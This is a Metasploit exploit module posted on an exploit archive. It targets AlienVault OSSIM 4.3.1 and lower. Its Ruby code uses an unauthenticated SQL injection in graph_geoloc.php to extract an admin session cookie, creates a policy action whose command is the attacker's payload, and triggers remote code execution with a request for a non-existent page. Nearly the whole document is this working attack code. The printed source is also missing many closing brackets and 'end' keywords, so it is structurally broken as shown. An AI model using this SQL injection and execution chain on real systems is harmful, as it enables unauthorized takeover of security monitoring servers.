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AlienVault OSSIM SQL Injection / Code Execution

AlienVault OSSIM SQL Injection / Code Execution
Posted May 2, 2014
Authored by Sasha Zivojinovic | Site metasploit.com

This Metasploit module exploits an unauthenticated SQL injection vulnerability affecting AlienVault OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an active admin session ID. If an administrator level user is identified, remote code execution can be gained by creating a high priority policy with an action containing our payload.

tags | exploit, remote, code execution, sql injection
SHA-256 | b58a85510e5daac3f9d9b649fd1dbf074e6a06ca09a0eb2b485f9cc59e6e2bdd

AlienVault OSSIM SQL Injection / Code Execution

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# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
'Name' => "AlienVault OSSIM SQL Injection and Remote Code Execution",
'Description' => %q{
This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault
OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an
active admin session ID. If an administrator level user is identified, remote code execution
can be gained by creating a high priority policy with an action containing our payload.
'License' => MSF_LICENSE,
'Author' =>
'Sasha Zivojinovic', # SQLi discovery
'xistence <xistence[at]0x90.nl>' # Metasploit module
'References' =>
['OSVDB', '106252'],
['EDB', '33006']
'DefaultOptions' =>
'SSL' => true,
'WfsDelay' => 10
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
'Compat' =>
'RequiredCmd' => 'generic perl python',
'Targets' =>
['Alienvault OSSIM 4.3', {}]
'Privileged' => true,
'DisclosureDate' => "Apr 24 2014",
'DefaultTarget' => 0))

OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
], self.class)

def check
marker = rand_text_alpha(6)
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli }

if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Safe


def exploit
marker = rand_text_alpha(6)
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"

print_status("#{peer} - Trying to grab admin session through SQLi")

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli }

if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
admin_session = $1
@cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
print_status("#{peer} - Admin session cookie is [ #{@cookie} ]")
fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")

# Creating an Action containing our payload, which will be executed by any event (not only alarms)
action = rand_text_alpha(8+(rand(8)))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "modifyactions.php"),
'cookie' => @cookie,
'vars_post' => {
'action' => 'new',
'action_name' => action,
'descr' => action,
'action_type' => '2',
'only' => 'on',
'cond' => 'True',
'exec_command' => payload.encoded

if res && res.code == 200
print_status("#{peer} - Created Action [ #{action} ]")
fail_with(Failure::Unknown, "#{peer} - Action creation failed!")

# Retrieving the Action ID, used to clean up the action after successful exploitation
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
'cookie' => @cookie,
'vars_post' => {
'page' => '1',
'rp' => '2000'

if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
@action_id = $1
print_status("#{peer} - Action ID is [ #{@action_id} ]")
fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")

# Retrieving the policy data, necessary for proper cleanup after succesful exploitation
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
'cookie' => @cookie,
'vars_get' => {
'm_opt' => 'configuration',
'sm_opt' => 'threat_intelligence',
'h_opt' => 'policy'

if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
policy_ctx = $1
policy_group = $2
print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")

# Creating policy which will be triggered by any source/destination
policy = rand_text_alpha(8+(rand(8)))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
'cookie' => @cookie,
'vars_post' => {
'descr' => policy,
'active' => '1',
'group' => policy_group,
'ctx' => policy_ctx,
'order' => '1', # Makes this the first policy, overruling all the other policies
'action' => 'new',
'sources[]' => '00000000000000000000000000000000', # Source is ANY
'dests[]' => '00000000000000000000000000000000', # Destination is ANY
'portsrc[]' => '0', # Any source port
'portdst[]' => '0', # Any destination port
'plug_type' => '1', # Taxonomy
'plugins[0]' => 'on',
'taxfilters[]' =>'20@13@118', # Product Type: Operating System, Category: Application, Subcategory: Web - Not Found
'tax_pt' => '0',
'tax_cat' => '0',
'tax_subc' => '0',
'mboxs[]' => '00000000000000000000000000000000',
'rep_act' => '0',
'rep_sev' => '1',
'rep_rel' => '1',
'rep_dir' => '0',
'ev_sev' => '1',
'ev_rel' => '1',
'tzone' => 'Europe/Amsterdam',
'date_type' => '1',
'begin_hour' => '0',
'begin_minute' => '0',
'begin_day_week' => '1',
'begin_day_month' => '1',
'begin_month' => '1',
'end_hour' => '23',
'end_minute' => '59',
'end_day_week' => '7',
'end_day_month' => '31',
'end_month' => '12',
'actions[]' => @action_id,
'sim' => '1',
'priority' => '1',
'qualify' => '1',
'correlate' => '0', # Don't make any correlations
'cross_correlate' => '0', # Don't make any correlations
'store' => '0' # We don't want to store anything :)

if res && res.code == 200
print_status("#{peer} - Created Policy [ #{policy} ]")
fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")

# Retrieve policy ID, needed for proper cleanup after succesful exploitation
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'ctx' => policy_ctx,
'group' => policy_group
'vars_post' => {
'page' => '1',
'rp' => '2000'
if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
@policy_id = $1
print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!")
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")

# Reload the policies to make our new policy active
print_status("#{peer} - Reloading Policies")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => @cookie,
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'

if res && res.code == 200
print_status("#{peer} - Policies reloaded!")
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")

# Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
dont_exist = rand_text_alpha(8+rand(4))
print_status("#{peer} - Triggering policy and action by requesting a non existing url")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, dont_exist),
'cookie' => @cookie

if res and res.code == 404
print_status("#{peer} - Payload delivered")
fail_with(Failure::Unknown, "#{peer} - Payload failed!")


def cleanup
# Clean up, retrieve token so that the policy can be removed
print_status("#{peer} - Cleaning up")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
'cookie' => @cookie,
'vars_post' => { 'f_name' => 'delete_policy' }

if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
print_warning("#{peer} - Unable to retrieve token")

# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policy_id,
'token' => token

if res && res.code == 200
print_status("#{peer} - Policy ID [ #{@policy_id} ] removed")
print_warning("#{peer} - Unable to remove Policy ID")

# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @action_id,

if res && res.code == 200
print_status("#{peer} - Action ID [ #{@action_id} ] removed")
print_warning("#{peer} - Unable to remove Action ID")

# Reload the policies to revert back to the state before exploitation
print_status("#{peer} - Reloading Policies")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => @cookie,
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'

if res && res.code == 200
print_status("#{peer} - Policies reloaded!")
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")

super # mixins should be able to cleanup even in case of Exception

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